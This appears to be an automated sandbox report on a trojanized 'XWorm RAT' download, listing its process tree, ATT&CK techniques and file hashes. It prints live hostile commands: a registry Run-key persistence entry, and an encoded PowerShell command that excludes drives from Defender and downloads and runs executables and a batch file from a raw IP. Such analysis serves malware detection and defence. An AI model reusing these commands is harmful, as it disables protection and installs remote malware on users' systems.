C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4968
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2812
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3508
-
C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XWorm RAT V2.1.exe"C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XWorm RAT V2.1.exe"1⤵
- System Location Discovery: System Language Discovery
PID:116 -
C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\Command Reciever.exe"C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\Command Reciever.exe"2⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:3504
-
-
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpBA33.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpBA33.tmp.bat3⤵PID:3500
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2436"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3448
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:840
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:2540
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3568 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f5⤵PID:5036
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f6⤵
- Adds Run key to start application
- Modifies registry key
PID:4856
-
-
-
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:840
-
C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XHVNC.exe"C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XHVNC.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4008
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\Fixer.bat" "1⤵PID:5036
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\Fixer.bat"1⤵PID:2596
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3e8 0x4741⤵PID:3032
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4484
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\XWorm\" -spe -an -ai#7zMap19970:72:7zEvent325801⤵
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
C:\Users\Admin\Downloads\XWorm\XWorm.exe"C:\Users\Admin\Downloads\XWorm\XWorm.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5084 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵PID:1720
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3724 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcwBlACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AYwBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAhACAAWQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIAB0AGgAaQBzACAAcwBvAGYAdAB3AGEAcgBlACAAYQBzACAAQQBkAG0AaQBuACEAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBuAHEAegAjAD4AOwAiADsAPAAjAHkAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB4AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBxAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AeQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAcABsAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAHAAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBlAGEAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAHMAYwBvAG4AZgAuAGUAeABlACcAKQApADwAIwBqAHMAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAzAC4AMgAyADMALgAyADMANAAvAGEAdgBkAGkAcwBhAGIAbABlAC4AYgBhAHQAJwAsACAAPAAjAG4AYwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB1AHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApACkAPAAjAGcAZwB6ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8ATQBQAFMAVgBDAC4AZQB4AGUAJwAsACAAPAAjAGIAegBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgBlAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApACkAPAAjAG4AYwBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AUABMAFYALgBlAHgAZQAnACwAIAA8ACMAZQBkAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AGIAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHEAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAEwALgBlAHgAZQAnACkAKQA8ACMAYgBkAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBpAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AcwBjAG8AbgBmAC4AZQB4AGUAJwApADwAIwBhAGIAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBwAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApADwAIwB4AGoAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAGIAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABxAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApADwAIwBuAGEAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGwAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBtAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAC4AZQB4AGUAJwApADwAIwBrAG0AcQAjAD4A"3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nci#>[System.Windows.Forms.MessageBox]::Show('Injection failed! You must run this software as Admin!','','OK','Warning')<#nqz#>;4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4804
-
-
-
-
C:\Users\Admin\Downloads\XWorm\XWorm.exe"C:\Users\Admin\Downloads\XWorm\XWorm.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcwBlACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AYwBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAhACAAWQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIAB0AGgAaQBzACAAcwBvAGYAdAB3AGEAcgBlACAAYQBzACAAQQBkAG0AaQBuACEAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBuAHEAegAjAD4AOwAiADsAPAAjAHkAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB4AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBxAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AeQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAcABsAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAHAAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBlAGEAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAHMAYwBvAG4AZgAuAGUAeABlACcAKQApADwAIwBqAHMAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAzAC4AMgAyADMALgAyADMANAAvAGEAdgBkAGkAcwBhAGIAbABlAC4AYgBhAHQAJwAsACAAPAAjAG4AYwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB1AHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApACkAPAAjAGcAZwB6ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8ATQBQAFMAVgBDAC4AZQB4AGUAJwAsACAAPAAjAGIAegBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgBlAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApACkAPAAjAG4AYwBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AUABMAFYALgBlAHgAZQAnACwAIAA8ACMAZQBkAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AGIAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHEAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAEwALgBlAHgAZQAnACkAKQA8ACMAYgBkAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBpAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AcwBjAG8AbgBmAC4AZQB4AGUAJwApADwAIwBhAGIAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBwAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApADwAIwB4AGoAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAGIAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABxAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApADwAIwBuAGEAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGwAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBtAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAC4AZQB4AGUAJwApADwAIwBrAG0AcQAjAD4A"3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nci#>[System.Windows.Forms.MessageBox]::Show('Injection failed! You must run this software as Admin!','','OK','Warning')<#nqz#>;4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
2Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
Filesize
1KB
MD5d584df872086c0f7442a664a33d38fe5
SHA1f0fad100fda4e8bb82ce5bc7d03953605ac53a5d
SHA256fdb68980ecdb4c9b464cc6a07ec410b2c7dda5b01240a0a8c860e9a94fe372bc
SHA5125232ebc39075096fa6ae5ae6d5b7b4580003e0be87779281c27fc1e0646500c76ca2178205ccc06e3b85df02a3a88ddb864723a3978cc97a9d63fa07196cdd79
-
Filesize
152B
MD556a4f78e21616a6e19da57228569489b
SHA121bfabbfc294d5f2aa1da825c5590d760483bc76
SHA256d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb
SHA512c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b
-
Filesize
152B
MD5e443ee4336fcf13c698b8ab5f3c173d0
SHA19bf70b16f03820cbe3158e1f1396b07b8ac9d75a
SHA25679e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b
SHA512cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd
-
Filesize
2KB
MD59050878b0a19aaef4aedb837dcba9a55
SHA164c20b84848101a339f194dd2ce18ce4ba98e905
SHA2562f702b06fbbd9f72bd15bfaeb66055019483915f47cc88150b3821d73d2c96ac
SHA5122744a749e568e4960e40788cc516ec50e4318219d90f139d63cae7070684925c07d1bc966197c3a47b4d6be0b76d9c61609b0480963120af52bb92ad834a3b8a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize2KB
MD547ae401d230e16c205f4987d5b321b6a
SHA1e57345db1d975a56f912f29903cbc89ead592626
SHA256007df08cd73779cab0db6a4f074c7f1ac89334efa208c99aaf50c75541c7ac9e
SHA512af537f1f197dbb9158d4b84c5e6528841e6e599e53608f26b2c853e44daa4fa8913fc480e1913ce1f4f55299000cff40293f46df02aa3fa377424cc1719a86cb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1KB
MD5a0d9e3c7e91ea6e081feaba16565e6ca
SHA1e77df7560075ac0a1096e682303aba65e44a1123
SHA256c54eb4b36802b8690d425e5eb45e2c5d60b8201ba07b952fd9ab2513e77515b1
SHA5126ac51c1bca2c34e04a4e9c4e6ef87fa2c6fad429e59338525d8831a029d6d9874f7119cec47a5d3383cf7cff85fcbe9b335750253581f70e274a20b6632d1bc6
-
Filesize
124KB
MD57550f3f7eb4a154ae8670fc2b478be7b
SHA176604c17da02c25b4023eaf6f54386e0208592c6
SHA256e4d7e82cb672a3b1d1c69db0d6e1391073a508a11cb351d5bf25ef7d1a2d4a81
SHA5128582f49fa7af185f58b6f66421c73911e1f1b793e1a38e0cd9312f89f98077d73b7afc2342a842a72869bae31eacceb4eb8c0be9e71815e403246bccaa14bbed
-
Filesize
573B
MD594716db8a4f3d9b64b6c3234c31ab99e
SHA1212ef4fb095c5d4f3f7cf7ffb3d4bdbd175b270f
SHA25631b69e06e12f39d0cf66a18d7ae456a451f7a085d6adc5891f4268771dc2398e
SHA5121f6cacaa86694623245f1e1b70252b319c7ffac2fb554a038f780242216ff197e0ec38a6f28aad8bf142c25ed9cd05f23516dd9b5b03a811ed6eb40daf4c2d0e
-
Filesize
939B
MD5d92e8b3968e461a5dceb22373812dd81
SHA1ce8256b151960bf21200a5f2c32e1d15d835a665
SHA256d57da134191149b62a3fedef70e5740391f045d5ff84ef2714673df962253603
SHA512e6414a1a98e6bc4524dc46d00d1d11f2805fd8277669e090ac9140d9c99b219878716f74f0a68f95336670bdd9dc87325638445efd4e009882b8ff181c0dcdd7
-
Filesize
5KB
MD598965357f7ffb54f9b435d8e135aab7f
SHA1f6ff2e2c26ace9a1adb26915e167e9fd96f282f8
SHA2565fe2f4f45907b6470caf5e6104f1249664af1bf25f7caa1349cd8168ba3ea516
SHA512d889b1ada531e83c427d0dba5c3e79f022a65119f500b5969b931c446a552fe431a178eba1a5a070a15f5c48fcee9a587afad8a0f0212ed176e83ed2e13fe084
-
Filesize
6KB
MD5e0060052b51ce4a77c7dd2f22bc54f85
SHA10702bcc0ba617dcfce20dae23270ec5ef77cbbe7
SHA2569f75c33d4e3ee341f2f15387e8471955d1311b857d22d694571643bf8bc1bb93
SHA512d77255837fe68e1475f40ab2d1ea325aa6fea0952929ab999745f865c8ea3b919baa451a2fa3f51f3eee5248ed38f12758829590bd4c5a44d03c410fc1666d6c
-
Filesize
6KB
MD53afa45bf802f6c9ff6ca5a36d08ebd58
SHA16d0fcda4e203539c48270d80aa91831309e4372c
SHA256ccc0b36f5c9cbd6e9d05c4a7f5bd7c0b2a687baf89d7cd7d35eebaa33e01adbd
SHA5123fffe224a2546f2bbfb13089ec550b01f31383c1eea4a34c8136b6bfafac054c2825e35ea3075b3849a4f5a0ff1a509e658fec1ca3da9a6ce31f0b2729e700f6
-
Filesize
7KB
MD5e34c3654ffdc8c0bc3836989bf229451
SHA1e21983609cf9a75fb318b1742c6fa2aed10fe477
SHA256f821035d51c9bab7f3815041401147c39464ddbd968c5eb0fc020bd26e3c5be2
SHA512ddab78500e1619ca40ce8278a5831da108b8cf2839e71f070a5f776702b424f799d9f633bf59e4d9e988aeed8d0e79374ff756db4f36e829609272a27033728a
-
Filesize
7KB
MD51be21c1db1b0d0981fb02a60f334e1c5
SHA171bb9beb7da7d53c89fee634842a0652d015693d
SHA2562d5feb6a4e7019f4c065c986d118c18cdfb2f0bd62c925d2e808316e4bf052e8
SHA512ae564b021355a5464f553f582b1cbbf7cd2b31cb67c7ebe88d14c21f1a1209c6c0f7634b888cf982ca0556f83bfc0e59a4857cc9864f17d2a61dcf3adb340e25
-
Filesize
1KB
MD5849fe30197bb60db2c1ec1726292aefd
SHA1cd04c0b3f7fdc5c9ba8bc24fff967c459eb31234
SHA25646d58704d147d06a85cd15e4c93c661987c11d57e0b7546ee54c246670c4103b
SHA5127062796ca6f91b3dfa9f94236147a99a9d892eb386df88905c0a86fbeb7bfef06afeefe4e62033287fd49f462124ee5bd80c7f839021e2a608bf7f6b7b12e5be
-
Filesize
1KB
MD5edfd86a120416761eb981ca631e1dcfc
SHA113291fea0d0f22dd770c6fb65b860fd83524fb6f
SHA2566855dbc4b0ad97df32d8fe67cce353ef925bbb5ae229ecee586730a04ebd6e8b
SHA5123ea0d781bd7d2826cd963cc7f07c23fed33d0e328f7dfd2fbca991cd054ebdf5589302e1da43f6f0c527d39ef1085a34698ddbfb659486340fe5c9612b3e0efd
-
Filesize
1KB
MD5ea3732c8d3abbe0bb8f035d08a48dd2a
SHA13859a444711ce2d6a57467b8cd1bc3edc0dc2e10
SHA256baf43c381be1010ebb147d389899fbeabaf2e8a4db05b16a8e8a4fbd3a2f0e76
SHA51275195ad1ddae496c3c8d584daa12caac2790d8eca3fccbe892a20c6399ca362215e36eba49549af02f5bf3cdea18297943cefebde3a6ee5b29109e46f6359c4f
-
Filesize
1KB
MD5aa3f32ad63d5cedf668ea55a291eee0b
SHA17edfdfe0005bd3a26c4cdb9a4473b98f43f6bf47
SHA2569c753748a20bfa71a6033ac6175e58563d70843467e3540702e95570c1abdd76
SHA51235140ddce98dcd9e525419654a6c96c98c97e329315a21e6ae6dbdeb6e2ba89f206711978fdd7f8fe0f3fe157c361feada6c45f9c3be23dac41558e60e35cbd0
-
Filesize
1KB
MD54d0a517ae6f199cccf17823c12a9810f
SHA1a02df5075cdb7081a96645f7070673f9492a33b6
SHA256fa643b117eb9535449c1c64c41334fd31b30b3cc3b2f7b6edfe8feff35f95996
SHA5122e15144d964f17b1df9abbfbed9525306e6f54c5059740f1cc385d32f1f57a77ee74e577ffdd6269c04ba0f056c32152298e8e89e072bc58bbff8418a81b1834
-
Filesize
1KB
MD536251182ef356af2eaeba3f582057965
